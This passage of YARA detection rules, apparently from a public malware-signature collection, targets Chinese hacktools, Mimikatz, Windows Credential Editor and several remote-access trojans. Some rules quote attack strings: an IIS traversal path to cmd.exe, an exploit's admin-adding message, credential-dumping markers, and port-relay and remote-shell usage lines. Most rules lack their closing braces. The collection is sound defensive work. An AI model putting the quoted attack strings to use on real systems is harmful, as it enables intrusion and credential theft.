   		$s5 = "0    :SCAN BEGUN ON PORT:"   
   		$s6 = "0    :PORTSCAN READY."   
   	condition:   
   		all of them   
rule Ms_Viru_v {   
   	meta:   
   		description = "Chinese Hacktool Set - file v.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "ecf4ba6d1344f2f3114d52859addee8b0770ed0d"   
   	strings:   
   		$s1 = "c:\\windows\\system32\\command.com /c " fullword ascii   
   		$s2 = "Easy Usage Version -- Edited By: racle@tian6.com" fullword ascii   
   		$s3 = "OH,Sry.Too long command." fullword ascii   
   		$s4 = "Success! Commander." fullword ascii   
   		$s5 = "Hey,how can racle work without ur command ?" fullword ascii   
   		$s6 = "The exploit thread was unable to map the virtual 8086 address space" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 100KB and 3 of them   
rule CN_Tools_MyUPnP {   
   	meta:   
   		description = "Chinese Hacktool Set - file MyUPnP.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "15b6fca7e42cd2800ba82c739552e7ffee967000"   
   	strings:   
   		$s1 = "<description>BYTELINKER.COM</description>" fullword ascii   
   		$s2 = "myupnp.exe" fullword ascii   
   		$s3 = "LOADER ERROR" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 1500KB and all of them   
rule Mimikatz_Memory_Rule_2 : APT {   
   	meta:   
   		description = "Mimikatz Rule generated from a memory dump"   
   		author = "Florian Roth - Florian Roth"   
   		type = "memory"   
   		score = 80   
   	strings:   
   		$s0 = "sekurlsa::" ascii   
   		$x1 = "cryptprimitives.pdb" ascii   
   		$x2 = "Now is t1O" ascii fullword   
   		$x4 = "ALICE123" ascii   
   		$x5 = "BOBBY456" ascii   
   	condition:   
   		$s0 and 1 of ($x*)   
rule AppInitHook {   
   	meta:   
   		description = "AppInitGlobalHooks-Mimikatz - Hide Mimikatz From Process Lists - file AppInitHook.dll"   
   		author = "Florian Roth"   
   		reference = "https://goo.gl/Z292v6"   
   		date = "2015-07-15"   
   		score = 70   
   		hash = "e7563e4f2a7e5f04a3486db4cefffba173349911a3c6abd7ae616d3bf08cfd45"   
   	strings:   
   		$s0 = "\\Release\\AppInitHook.pdb" ascii   
   		$s1 = "AppInitHook.dll" fullword ascii   
   		$s2 = "mimikatz.exe" fullword wide   
   		$s3 = "]X86Instruction->OperandSize >= Operand->Length" fullword wide   
   		$s4 = "mhook\\disasm-lib\\disasm.c" fullword wide   
   		$s5 = "mhook\\disasm-lib\\disasm_x86.c" fullword wide   
   		$s6 = "VoidFunc" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 500KB and 4 of them   
rule SQLTools {   
   	meta:   
   		description = "Chinese Hacktool Set - file SQLTools.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "38a9caa2079afa2c8d7327e7762f7ed9a69056f7"   
   	strings:   
   		$s1 = "DBN_POST" fullword wide   
   		$s2 = "LOADER ERROR" fullword ascii   
   		$s3 = "www.1285.net" fullword wide   
   		$s4 = "TUPFILEFORM" fullword wide   
   		$s5 = "DBN_DELETE" fullword wide   
   		$s6 = "DBINSERT" fullword wide   
   		$s7 = "Copyright (C) Kibosoft Corp. 2001-2006" fullword wide   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 2350KB and all of them   
rule hscan_gui {   
   	meta:   
   		description = "Chinese Hacktool Set - file hscan-gui.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "1885f0b7be87f51c304b39bc04b9423539825c69"   
   	strings:   
   		$s0 = "Hscan.EXE" fullword wide   
   		$s1 = "RestTool.EXE" fullword ascii   
   		$s3 = "Hscan Application " fullword wide   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 550KB and all of them   
rule x_way2_5_sqlcmd {   
   	meta:   
   		description = "Chinese Hacktool Set - file sqlcmd.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "5152a57e3638418b0d97a42db1c0fc2f893a2794"   
   	strings:   
   		$s1 = "LOADER ERROR" fullword ascii   
   		$s2 = "The procedure entry point %s could not be located in the dynamic link library %s" fullword ascii   
   		$s3 = "The ordinal %u could not be located in the dynamic link library %s" fullword ascii   
   		$s4 = "kernel32.dll" fullword ascii   
   		$s5 = "VirtualAlloc" fullword ascii   
   		$s6 = "VirtualFree" fullword ascii   
   		$s7 = "VirtualProtect" fullword ascii   
   		$s8 = "ExitProcess" fullword ascii   
   		$s9 = "user32.dll" fullword ascii   
   		$s16 = "MessageBoxA" fullword ascii   
   		$s10 = "wsprintfA" fullword ascii   
   		$s11 = "kernel32.dll" fullword ascii   
   		$s12 = "GetProcAddress" fullword ascii   
   		$s13 = "GetModuleHandleA" fullword ascii   
   		$s14 = "LoadLibraryA" fullword ascii   
   		$s15 = "odbc32.dll" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 23KB and filesize > 20KB and all of them   
rule tools_NTCmd {   
   	meta:   
   		description = "Chinese Hacktool Set - file NTCmd.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "a3ae8659b9a673aa346a60844208b371f7c05e3c"   
   	strings:   
   		$s1 = "pipecmd \\\\%s -U:%s -P:\"\" %s" fullword ascii   
   		$s2 = "[Usage]:  %s <HostName|IP> <Username> <Password>" fullword ascii   
   		$s3 = "pipecmd \\\\%s -U:%s -P:%s %s" fullword ascii   
   		$s4 = "============By uhhuhy (Feb 18,2003) - http://www.cnhonker.net============" fullword ascii /* PEStudio Blacklist: os */   
   		$s5 = "=======================NTcmd v0.11 for HScan v1.20=======================" fullword ascii   
   		$s6 = "NTcmd>" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 80KB and 2 of them   
rule datPcShare {   
   	meta:   
   		description = "Chinese Hacktool Set - file datPcShare.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "87acb649ab0d33c62e27ea83241caa43144fc1c4"   
   	strings:   
   		$s1 = "PcShare.EXE" fullword wide   
   		$s2 = "MZKERNEL32.DLL" fullword ascii   
   		$s3 = "PcShare" fullword wide   
   		$s4 = "QQ:4564405" fullword wide   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 500KB and all of them   
rule WAF_Bypass {   
   	meta:   
   		description = "Chinese Hacktool Set - file WAF-Bypass.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "860a9d7aac2ce3a40ac54a4a0bd442c6b945fa4e"   
   	strings:   
   		$s1 = "Email: blacksplitn@gmail.com" fullword wide   
   		$s2 = "User-Agent:" fullword wide   
   		$s3 = "Send Failed.in RemoteThread" fullword ascii   
   		$s4 = "www.example.com" fullword wide   
   		$s5 = "Get Domain:%s IP Failed." fullword ascii   
   		$s6 = "Connect To Server Failed." fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 7992KB and 5 of them   
rule ASPack_ASPACK {   
   	meta:   
   		description = "Disclosed hacktool set (old stuff) - file ASPACK.EXE"   
   		author = "Florian Roth"   
   		date = "23.11.14"   
   		score = 60   
   		hash = "c589e6fd48cfca99d6335e720f516e163f6f3f42"   
   	strings:   
   		$s0 = "ASPACK.EXE" fullword wide   
   		$s5 = "CLOSEDFOLDER" fullword wide   
   		$s10 = "ASPack compressor" fullword wide   
   	condition:   
   		all of them   
rule LinuxHacktool_eyes_pscan2 {   
   	meta:   
   		description = "Linux hack tools - file pscan2"   
   		author = "Florian Roth"   
   		reference = "not set"   
   		date = "2015/01/19"   
   		hash = "56b476cba702a4423a2d805a412cae8ef4330905"   
   	strings:   
   		$s0 = "# pscan completed in %u seconds. (found %d ips)" fullword ascii   
   		$s1 = "Usage: %s <b-block> <port> [c-block]" fullword ascii   
   		$s3 = "%s.%d.* (total: %d) (%.1f%% done)" fullword ascii   
   		$s8 = "Invalid IP." fullword ascii   
   		$s9 = "# scanning: " fullword ascii   
   		$s10 = "Unable to allocate socket." fullword ascii   
   	condition:   
   		2 of them   
rule Hacktools_CN_Panda_tasksvr {   
   	meta:   
   		description = "Disclosed hacktool set - file tasksvr.exe"   
   		author = "Florian Roth"   
   		date = "17.11.14"   
   		score = 60   
   		hash = "a73fc74086c8bb583b1e3dcfd326e7a383007dc0"   
   	strings:   
   		$s2 = "Consys21.dll" fullword ascii   
   		$s4 = "360EntCall.exe" fullword wide   
   		$s15 = "Beijing1" fullword ascii   
   	condition:   
   		all of them   
rule x_way2_5_X_way {   
   	meta:   
   		description = "Chinese Hacktool Set - file X-way.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "8ba8530fbda3e8342e8d4feabbf98c66a322dac6"   
   	strings:   
   		$s0 = "TTFTPSERVERFRM" fullword wide   
   		$s1 = "TPORTSCANSETFRM" fullword wide   
   		$s2 = "TIISSHELLFRM" fullword wide   
   		$s3 = "TADVSCANSETFRM" fullword wide   
   		$s4 = "ntwdblib.dll" fullword ascii   
   		$s5 = "TSNIFFERFRM" fullword wide   
   		$s6 = "TCRACKSETFRM" fullword wide   
   		$s7 = "TCRACKFRM" fullword wide   
   		$s8 = "dbnextrow" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 1000KB and 5 of them   
rule Dos_netstat {   
   	meta:   
   		description = "Chinese Hacktool Set - file netstat.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "d0444b7bd936b5fc490b865a604e97c22d97e598"   
   	strings:   
   		$s0 = "w03a2409.dll" fullword ascii   
   		$s1 = "Retransmission Timeout Algorithm    = unknown (%1!u!)" fullword wide  /* Goodware String - occured 2 times */   
   		$s2 = "Administrative Status  = %1!u!" fullword wide  /* Goodware String - occured 2 times */   
   		$s3 = "Packet Too Big            %1!-10u!  %2!-10u!" fullword wide  /* Goodware String - occured 2 times */   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 150KB and all of them   
rule PLUGIN_AJunk {   
   	meta:   
   		description = "Chinese Hacktool Set - file AJunk.dll"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "eb430fcfe6d13b14ff6baa4b3f59817c0facec00"   
   	strings:   
   		$s1 = "AJunk.dll" fullword ascii   
   		$s2 = "AJunk.DLL" fullword wide   
   		$s3 = "AJunk Dynamic Link Library" fullword wide   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 560KB and all of them   
rule kelloworld_2 {   
   	meta:   
   		description = "Chinese Hacktool Set - file kelloworld.dll"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "55d5dabd96c44d16e41f70f0357cba1dda26c24f"   
   	strings:   
   		$s1 = "Hello World!" fullword wide   
   		$s2 = "kelloworld.dll" fullword ascii   
   		$s3 = "kelloworld de mimikatz pour Windows" fullword wide   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 200KB and all of them   
rule Dos_GetPass {   
   	meta:   
   		description = "Chinese Hacktool Set - file GetPass.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "d18d952b24110b83abd17e042f9deee679de6a1a"   
   	strings:   
   		$s0 = "GetLogonS" ascii   
   		$s3 = "/showthread.php?t=156643" ascii   
   		$s8 = "To Run As Administ" ascii   
   		$s18 = "EnableDebugPrivileg" fullword ascii   
   		$s19 = "sedebugnameValue" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 890KB and all of them   
rule Ms_Viru_racle {   
   	meta:   
   		description = "Chinese Hacktool Set - file racle.dll"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "13116078fff5c87b56179c5438f008caf6c98ecb"   
   	strings:   
   		$s0 = "PsInitialSystemProcess @%p" fullword ascii   
   		$s1 = "PsLookupProcessByProcessId(%u) Failed" fullword ascii   
   		$s2 = "PsLookupProcessByProcessId(%u) => %p" fullword ascii   
   		$s3 = "FirstStage() Loaded, CurrentThread @%p Stack %p - %p" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 210KB and all of them   
rule Tools_unknown {   
   	meta:   
   		description = "Chinese Hacktool Set - file unknown.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "4be8270c4faa1827177e2310a00af2d5bcd2a59f"   
   	strings:   
   		$s1 = "No data to read.$Can not bind in port range (%d - %d)" fullword wide   
   		$s2 = "GET /ok.asp?id=1__sql__ HTTP/1.1" fullword ascii   
   		$s3 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" fullword ascii /* PEStudio Blacklist: agent */   
   		$s4 = "Failed to clear tab control Failed to delete tab at index %d\"Failed to retrieve" wide   
   		$s5 = "Host: 127.0.0.1" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 2500KB and 4 of them   
rule cgis4_cgis4 {   
   	meta:   
   		description = "Auto-generated rule on file cgis4.exe"   
   		author = "yarGen Yara Rule Generator by Florian Roth"   
   		hash = "d658dad1cd759d7f7d67da010e47ca23"   
   	strings:   
   		$s0 = ")PuMB_syJ"   
   		$s1 = "&,fARW>yR"   
   		$s2 = "m3hm3t_rullaz"   
   		$s3 = "7Projectc1"   
   		$s4 = "Ten-GGl\""   
   		$s5 = "/Moziqlxa"   
   	condition:   
   		all of them   
rule GoodToolset_ms11046 {   
   	meta:   
   		description = "Chinese Hacktool Set - file ms11046.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "f8414a374011fd239a6c6d9c6ca5851cd8936409"   
   	strings:   
   		$s1 = "[*] Token system command" fullword ascii   
   		$s2 = "[*] command add user 90sec 90sec" fullword ascii   
   		$s3 = "[*] Add to Administrators success" fullword ascii   
   		$s4 = "[*] User has been successfully added" fullword ascii   
   		$s5 = "Program: %s%s%s%s%s%s%s%s%s%s%s" fullword ascii  /* Goodware String - occured 3 times */   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 840KB and 2 of them   
rule sig_238_sqlcmd {   
   	meta:   
   		description = "Disclosed hacktool set (old stuff) - file sqlcmd.exe"   
   		author = "Florian Roth"   
   		date = "23.11.14"   
   		score = 40   
   		hash = "b6e356ce6ca5b3c932fa6028d206b1085a2e1a9a"   
   	strings:   
   		$s0 = "Permission denial to EXEC command.:(" fullword ascii   
   		$s3 = "by Eyas<cooleyas@21cn.com>" fullword ascii   
   		$s4 = "Connect to %s MSSQL server success.Enjoy the shell.^_^" fullword ascii   
   		$s5 = "Usage: %s <host> <uid> <pwd>" fullword ascii   
   		$s6 = "SqlCmd2.exe Inside Edition." fullword ascii   
   		$s7 = "Http://www.patching.net  2000/12/14" fullword ascii   
   		$s11 = "Example: %s 192.168.0.1 sa \"\"" fullword ascii   
   	condition:   
   		4 of them   
rule epathobj_exp64 {   
   	meta:   
   		description = "Chinese Hacktool Set - file epathobj_exp64.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "09195ba4e25ccce35c188657957c0f2c6a61d083"   
   	strings:   
   		$s1 = "Watchdog thread %d waiting on Mutex" fullword ascii   
   		$s2 = "Exploit ok run command" fullword ascii   
   		$s3 = "\\epathobj_exp\\x64\\Release\\epathobj_exp.pdb" fullword ascii   
   		$s4 = "Alllocated userspace PATHRECORD () %p" fullword ascii   
   		$s5 = "Mutex object did not timeout, list not patched" fullword ascii   
   		$s6 = "- inconsistent onexit begin-end variables" fullword wide  /* Goodware String - occured 96 times */   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 150KB and 2 of them   
rule aspbackdoor_asp4 {   
   	meta:   
   		description = "Disclosed hacktool set (old stuff) - file asp4.txt"   
   		author = "Florian Roth"   
   		date = "23.11.14"   
   		score = 60   
   		hash = "faf991664fd82a8755feb65334e5130f791baa8c"   
   	strings:   
   		$s0 = "system.dll" fullword ascii   
   		$s2 = "set sys=server.CreateObject (\"system.contral\") " fullword ascii   
   		$s3 = "Public Function reboot(atype As Variant)" fullword ascii   
   		$s4 = "t& = ExitWindowsEx(1, atype)" ascii   
   		$s5 = "atype=request(\"atype\") " fullword ascii   
   		$s7 = "AceiveX dll" fullword ascii   
   		$s8 = "Declare Function ExitWindowsEx Lib \"user32\" (ByVal uFlags As Long, ByVal " ascii   
   		$s10 = "sys.reboot(atype)" fullword ascii   
   	condition:   
   		all of them   
rule Hacktools_CN_Burst_Blast {   
   	meta:   
   		description = "Disclosed hacktool set - file Blast.bat"   
   		author = "Florian Roth"   
   		date = "17.11.14"   
   		score = 60   
   		hash = "b07702a381fa2eaee40b96ae2443918209674051"   
   	strings:   
   		$s0 = "@sql.exe -f ip.txt -m syn -t 3306 -c 5000 -u http:" ascii   
   		$s1 = "@echo off" fullword ascii   
   	condition:   
   		all of them   
rule sig_238_findoor {   
   	meta:   
   		description = "Disclosed hacktool set (old stuff) - file findoor.exe"   
   		author = "Florian Roth"   
   		date = "23.11.14"   
   		score = 60   
   		hash = "cdb1ececceade0ecdd4479ecf55b0cc1cf11cdce"   
   	strings:   
   		$s0 = "(non-Win32 .EXE or error in .EXE image)." fullword ascii   
   		$s8 = "PASS hacker@hacker.com" fullword ascii   
   		$s9 = "/scripts/..%c1%1c../winnt/system32/cmd.exe" fullword ascii   
   		$s10 = "MAIL FROM:hacker@hacker.com" fullword ascii   
   		$s11 = "http://isno.yeah.net" fullword ascii   
   	condition:   
   		4 of them   
rule Dos_lcx {   
   	meta:   
   		description = "Chinese Hacktool Set - file lcx.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "b6ad5dd13592160d9f052bb47b0d6a87b80a406d"   
   	strings:   
   		$s0 = "c:\\Users\\careful_snow\\" ascii   
   		$s1 = "Desktop\\Htran\\Release\\Htran.pdb" ascii   
   		$s3 = "[SERVER]connection to %s:%d error" fullword ascii   
   		$s4 = "-tran  <ConnectPort> <TransmitHost> <TransmitPort>" fullword ascii   
   		$s6 = "=========== Code by lion & bkbll, Welcome to [url]http://www.cnhonker.com[/url] " ascii   
   		$s7 = "[-] There is a error...Create a new connection." fullword ascii   
   		$s8 = "[+] Accept a Client on port %d from %s" fullword ascii   
   		$s11 = "-slave  <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort>" fullword ascii   
   		$s13 = "[+] Make a Connection to %s:%d...." fullword ascii   
   		$s16 = "-listen <ConnectPort> <TransmitPort>" fullword ascii   
   		$s17 = "[+] Waiting another Client on port:%d...." fullword ascii   
   		$s18 = "[+] Accept a Client on port %d from %s ......" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 100KB and 2 of them   
rule Dos_iis7 {   
   	meta:   
   		description = "Chinese Hacktool Set - file iis7.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "0a173c5ece2fd4ac8ecf9510e48e95f43ab68978"   
   	strings:   
   		$s0 = "\\\\localhost" fullword ascii   
   		$s1 = "iis.run" fullword ascii   
   		$s3 = ">Could not connecto %s" fullword ascii   
   		$s5 = "WHOAMI" ascii   
   		$s13 = "WinSta0\\Default" fullword ascii  /* Goodware String - occured 22 times */   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 140KB and all of them   
rule PassSniffer {   
   	meta:   
   		description = "Disclosed hacktool set (old stuff) - file PassSniffer.exe"   
   		author = "Florian Roth"   
   		date = "23.11.14"   
   		score = 60   
   		hash = "dcce4c577728e8edf7ed38ac6ef6a1e68afb2c9f"   
   	strings:   
   		$s2 = "Sniff" fullword ascii   
   		$s3 = "GetLas" fullword ascii   
   		$s4 = "VersionExA" fullword ascii   
   		$s10 = " Only RuntUZ" fullword ascii   
   		$s12 = "emcpysetprintf\\" fullword ascii   
   		$s13 = "WSFtartup" fullword ascii   
   	condition:   
   		all of them   
rule WCE_Modified_1_1014 {   
   	meta:   
   		description = "Modified (packed) version of Windows Credential Editor"   
   		author = "Florian Roth"   
   		hash = "09a412ac3c85cedce2642a19e99d8f903a2e0354"   
   		score = 70   
   	strings:   
   		$s0 = "LSASS.EXE" fullword ascii   
   		$s1 = "_CREDS" ascii   
   		$s9 = "Using WCE " ascii   
   	condition:   
   		all of them   
// https://otx.alienvault.com/pulse/56606c974637f2388ab0972e
rule xtreme_rat : Trojan   
   {   
   	meta:   
   		author="Kevin Falcoz"   
   		date="23/02/2013"   
   		description="Xtreme RAT"   
   	   
   	strings:   
   		$signature1={58 00 54 00 52 00 45 00 4D 00 45} /*X.T.R.E.M.E*/   
   		   
   	condition:   
   		$signature1   
rule xtreme_rat_1   
   {    
   	meta:   
   		maltype = "Xtreme RAT"   
   		ref = "https://github.com/reed1713"   
   		reference = "http://blog.trendmicro.com/trendlabs-security-intelligence/xtreme-rat-targets-israeli-government/"   
   	strings:   
   		$type="Microsoft-Windows-Security-Auditing"   
   		$eventid="5156"   
   		$data="windows\\system32\\sethc.exe"   
      
   		$type1="Microsoft-Windows-Security-Auditing"   
   		$eventid1="4688"   
   		$data1="AppData\\Local\\Temp\\Microsoft Word.exe"   
   	condition:   
   		all of them   
rule xtreme_rat_0   
   {    
   	meta:   
   		maltype = "Xtreme RAT"   
   		reference = "http://blog.trendmicro.com/trendlabs-security-intelligence/xtreme-rat-targets-israeli-government/"   
   	strings:   
   		$type="Microsoft-Windows-Security-Auditing"   
   		$eventid="5156"   
   		$data="windows\\system32\\sethc.exe"   
      
   		$type1="Microsoft-Windows-Security-Auditing"   
   		$eventid1="4688"   
   		$data1="AppData\\Local\\Temp\\Microsoft Word.exe"   
   	condition:   
   		all of them   
rule XtremeRATStrings : XtremeRAT Family   
   {   
       meta:   
           description = "XtremeRAT Identifying Strings"   
           author = "Seth Hardy"   
           last_modified = "2014-07-09"   
              
       strings:   
           $ = "dqsaazere"   
           $ = "-GCCLIBCYGMING-EH-TDM1-SJLJ-GTHR-MINGW32"   
              
       condition:   
          any of them   
rule Xtreme   
   {   
       meta:   
           description = "Xtreme RAT"   
   	author = "botherder https://github.com/botherder"   
      
       strings:   
           $string1 = /(X)tremeKeylogger/ wide ascii   
           $string2 = /(X)tremeRAT/ wide ascii   
           $string3 = /(X)TREMEUPDATE/ wide ascii   
           $string4 = /(S)TUBXTREMEINJECTED/ wide ascii   
      
           $unit1 = /(U)nitConfigs/ wide ascii   
           $unit2 = /(U)nitGetServer/ wide ascii   
           $unit3 = /(U)nitKeylogger/ wide ascii   
           $unit4 = /(U)nitCryptString/ wide ascii   
           $unit5 = /(U)nitInstallServer/ wide ascii   
           $unit6 = /(U)nitInjectServer/ wide ascii   
           $unit7 = /(U)nitBinder/ wide ascii   
           $unit8 = /(U)nitInjectProcess/ wide ascii   
      
       condition:   
           5 of them   
rule XtremeRATCode : XtremeRAT Family    
   {   
       meta:   
           description = "XtremeRAT code features"   
           author = "Seth Hardy"   
           last_modified = "2014-07-09"   
          
       strings:   
           // call; fstp st   
           $ = { E8 ?? ?? ?? ?? DD D8 }   
           // hiding string   
           $ = { C6 85 ?? ?? ?? ?? 4D C6 85 ?? ?? ?? ?? 70 C6 85 ?? ?? ?? ?? 64 C6 85 ?? ?? ?? ?? 62 C6 85 ?? ?? ?? ?? 6D }   
          
       condition:   
           all of them   
rule xtremrat : rat   
   {   
   	meta:   
   		author = "Jean-Philippe Teissier / @Jipe_"   
   		description = "Xtrem RAT v3.5"   
   		date = "2012-07-12"    
   		version = "1.0"    
   		filetype = "memory"   
      
   	strings:   
   		$a = "XTREME" wide   
   		$b = "XTREMEBINDER" wide   
   		$c = "STARTSERVERBUFFER" wide   
   		$d = "SOFTWARE\\XtremeRAT" wide   
   		$e = "XTREMEUPDATE" wide   
   		$f = "XtremeKeylogger" wide   
   		$g = "myversion|3.5" wide   
   		$h = "xtreme rat" wide nocase   
   	condition:   
   		2 of them   
rule xRAT20 : RAT   
   {   
   meta:   
   	author = "Rottweiler"   
   	date = "2015-08-20"   
   	description = "Identifies xRAT 2.0 samples"   
   	maltype = "Remote Access Trojan"   
   	hash0 = "cda610f9cba6b6242ebce9f31faf5d9c"   
   	hash1 = "60d7b0d2dfe937ac6478807aa7043525"   
   	hash2 = "d1b577fbfd25cc5b873b202cfe61b5b8"   
   	hash3 = "1820fa722906569e3f209d1dab3d1360"   
   	hash4 = "8993b85f5c138b0afacc3ff04a2d7871"   
   	hash5 = "0c231ed8a800b0f17f897241f1d5f4e3"   
   	hash1 = "60d7b0d2dfe937ac6478807aa7043525"   
   	hash8 = "2c198e3e0e299a51e5d955bb83c62a5e"   
   	sample_filetype = "exe"   
   	yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"   
   strings:   
   	$string0 = "GetDirectory: File not found" wide   
   	$string1 = "<>m__Finally8"   
   	$string2 = "Secure"   
   	$string3 = "ReverseProxyClient"   
   	$string4 = "DriveDisplayName"   
   	$string5 = "<IsError>k__BackingField"   
   	$string6 = "set_InstallPath"   
   	$string7 = "memcmp"   
   	$string8 = "urlHistory"   
   	$string9 = "set_AllowAutoRedirect"   
   	$string10 = "lpInitData"   
   	$string11 = "reader"   
   	$string12 = "<FromRawDataGlobal>d__f"   
   	$string13 = "mq.png" wide   
   	$string14 = "remove_KeyDown"   
   	$string15 = "ProtectedData"   
   	$string16 = "m_hotkeys"   
   	$string17 = "get_Hour"   
   	$string18 = "\\mozglue.dll" wide   
   condition:   
   	18 of them   
rule xRAT : RAT   
   {   
       meta:   
           author = " Kevin Breen <kevin@techanarchy.net>"   
           date = "2014/04"   
           ref = "http://malwareconfig.com/stats/xRat"   
           maltype = "Remote Access Trojan"   
           filetype = "exe"   
      
       strings:   
           $v1a = "DecodeProductKey"   
           $v1b = "StartHTTPFlood"   
           $v1c = "CodeKey"   
           $v1d = "MESSAGEBOX"   
           $v1e = "GetFilezillaPasswords"   
           $v1f = "DataIn"   
           $v1g = "UDPzSockets"   
           $v1h = {52 00 54 00 5F 00 52 00 43 00 44 00 41 00 54 00 41}   
      
           $v2a = "<URL>k__BackingField"   
           $v2b = "<RunHidden>k__BackingField"   
           $v2c = "DownloadAndExecute"   
           $v2d = "-CHECK & PING -n 2 127.0.0.1 & EXIT" wide   
           $v2e = "england.png" wide   
           $v2f = "Showed Messagebox" wide   
       condition:   
           all of ($v1*) or all of ($v2*)   
// https://otx.alienvault.com/pulse/596f7b2e2d213739405a8563
rule jRAT_conf : RAT    
   {   
   	meta:   
   		description = "jRAT configuration"    
   		author = "Jean-Philippe Teissier / @Jipe_"   
   		date = "2013-10-11"   
   		filetype = "memory"   
   		version = "1.0"    
   		ref1 = "https://github.com/MalwareLu/config_extractor/blob/master/config_jRAT.py"    
   		ref2 = "http://www.ghettoforensics.com/2013/10/dumping-malware-configuration-data-from.html"    
      
   	strings:   
   		$a = /port=[0-9]{1,5}SPLIT/    
      
   	condition:    
   		$a   
// https://otx.alienvault.com/pulse/5554d25fb45ff55e06641987
rule APT17_Sample_FXSST_DLL    
   {   
          
       meta:   
           description = "Detects Samples related to APT17 activity - file FXSST.DLL"   
           author = "Florian Roth"   
           reference = "https://goo.gl/ZiJyQv"   
           date = "2015-05-14"   
           hash = "52f1add5ad28dc30f68afda5d41b354533d8bce3"   
              
       strings:   
           $x1 = "Microsoft? Windows? Operating System" fullword wide   
           $x2 = "fxsst.dll" fullword ascii   
           $y1 = "DllRegisterServer" fullword ascii   
           $y2 = ".cSV" fullword ascii   
           $s1 = "GetLastActivePopup"   
           $s2 = "Sleep"   
           $s3 = "GetModuleFileName"   
           $s4 = "VirtualProtect"   
           $s5 = "HeapAlloc"   
           $s6 = "GetProcessHeap"   
           $s7 = "GetCommandLine"   
         
      condition:   
           uint16(0) == 0x5a4d and filesize < 800KB and ( 1 of ($x*) or all of ($y*) ) and all of ($s*)   
rule ZXProxy   
   {   
   meta:   
   	author = "ThreatConnect Intelligence Research Team"   
   	   
   strings:   
   	$C = "\\Control\\zxplug" nocase wide ascii   
   	$h = "http://www.facebook.com/comment/update.exe" wide ascii   
   	$S = "Shared a shell to %s:%s Successfully" nocase wide ascii   
   condition:   
   	any of them   
rule zoxPNG_RAT   
   {   
       meta:   
           Author      = "Novetta Advanced Research Group"   
           Date        = "2014/11/14"   
           Description = "ZoxPNG RAT, url inside"   
           Reference   = "http://www.novetta.com/wp-content/uploads/2014/11/ZoxPNG.pdf"   
      
       strings:    
           $url = "png&w=800&h=600&ei=CnJcUcSBL4rFkQX444HYCw&zoom=1&ved=1t:3588,r:1,s:0,i:92&iact=rc&dur=368&page=1&tbnh=184&tbnw=259&start=0&ndsp=20&tx=114&ty=58"   
      
       condition:    
           $url   
// https://otx.alienvault.com/pulse/58cdc54005e78502c2c2fac1
rule TROJAN_Notepad_shell_crew : Trojan {   
           meta:   
                   author = "RSA_IR"   
                   Date     = "4Jun13"   
                   File     = "notepad.exe v 1.1"   
                   MD5      = "106E63DBDA3A76BEEB53A8BBD8F98927"   
           strings:   
                   $s1 = "75BAA77C842BE168B0F66C42C7885997"   
                   $s2 = "B523F63566F407F3834BCC54AAA32524"   
           condition:   
                   $s1 or $s2   
rule TerminatorRat : RAT    
   {   
   	meta:   
   		description = "Terminator RAT"    
   		author = "Jean-Philippe Teissier / @Jipe_"   
